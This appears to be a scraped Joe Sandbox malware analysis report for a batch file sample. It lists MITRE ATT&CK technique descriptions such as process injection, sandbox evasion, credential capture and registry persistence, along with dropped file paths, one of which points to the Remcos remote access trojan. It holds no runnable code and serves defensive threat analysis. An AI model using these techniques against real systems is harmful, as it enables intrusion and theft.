Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 035aa01ea14ade65b73ccdbe2d1ff733cb02ff53ed95d403c8816b45ae3603b0
Instruction ID: dd6c54a99674906699c487290abd1be2c8296219c20f9c4623d8e7f5a82106c2
Opcode Fuzzy Hash: 035aa01ea14ade65b73ccdbe2d1ff733cb02ff53ed95d403c8816b45ae3603b0
Instruction Fuzzy Hash: CF41D531600606AFDB218FE5C844ABA7FE5EF15710F24C1EDE86DA71A2EB308D01DB60

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 9W9jJCj9EV.bat

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Sigma Signatures

System Summary

Data Obfuscation

HIPS / PFW / Operating System Protection Evasion

Stealing of Sensitive Information

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\ProgramData\remcos\logs.dat

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\5eda6a78-637f-453d-ac42-024a9335877d.tmp

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-250105075614Z-185.bmp

Windows Analysis Report
9W9jJCj9EV.bat

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks. These services, such as `VNC`, `Team Viewer`, `AnyDesk`, `ScreenConnect`, `LogMein`, `AmmyyAdmin`, and other remote monitoring and management (RMM) tools, are commonly used as legitimate technical support software and may be allowed by application control within a target environment.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre